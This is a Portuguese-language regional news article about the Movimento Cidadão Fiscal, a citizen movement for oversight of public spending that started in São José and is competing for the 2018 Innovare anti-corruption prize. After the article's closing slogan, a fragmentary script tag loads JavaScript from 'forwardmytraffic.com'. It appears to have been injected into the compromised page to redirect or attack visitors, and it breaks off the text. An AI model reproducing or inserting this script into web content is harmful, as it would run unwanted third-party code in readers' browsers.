InícioDestaqueMOVIMENTO CIDADÃO FISCAL DISPUTA PRÊMIO INNOVARE

MOVIMENTO CIDADÃO FISCAL DISPUTA PRÊMIO INNOVARE

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Idealizado pelo Observátorio Social de São José, o Movimento Cidadão Fiscal – Indo Além de Contribuinte e Eleitor surgiu para preencher uma lacuna que existia entre o Observatório e o Cidadão. Originalmente criado como como uma campanha para atrair pessoas para o OSSJ, ganhou um logo TIPO, um lema e muitos colaboradores. Hoje, já conta com mais de trinta núcleos espalhados por oito estados em todas as regiões do Brasil.

O que mais admira é a facilidade e a praticidade do Movimento, em suma, basta criar um grupo no Whatsapp, incluir os articuladores nacionais e deixar que a coisa aconteça naturalmente. É interessante como o Movimento consegue se adaptar as particularidades de cada município, como o case do município de Governador Celso Ramos, onde os cidadãos se organizaram de tal forma, que criaram três frentes de atuação, cada uma focada em uma demanda específica dos moradores.

 

Em Canoinhas, onde foi feito o projeto piloto, muitas ações já aconteceram, voltadas principalmente à prevenção de irregularidades que poderiam gerar ineficiência dos gastos do dinheiro do público.

 

Outras cidades que o Movimento já está bem encorpado são Porangatu – GO e Formiga -MG, nestes locais, assim como em Canoinhas, o MCF vem ganhando reconhecimento.

 

Todo esse reconhecimento possibilitou que o MCF fosse inscrito para participar da 15º edição do Prêmio INNOVARE, que em 2018 destacará iniciativas que tiverem como objetivo principal criar mecanismos para prevenir e combater a corrupção ou dar transparência ao poder público.

 

No último dia 11 de junho, na sede do Observatório Social em São josé – SC, vários articuladores municipais, bem como, o articulador nacional e um dos idealizadores do projeto, Sr. Jaime Luiz Klein, participaram da entrevista à representantedo Instituto Innovare, a qual constatou a existência e principalmente o potencial do Movimento Cidadão Fiscal a nível Brasil.

 

Destaca-se ainda, a importância dos cidadãos se unirem para fiscalizar o poder público, pois trabalhando em conjunto evitam-se ameaças e perseguições.

Atuando todos juntos sob o lema, “Vamos mudar o Brasil começando pelo nosso município”.… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.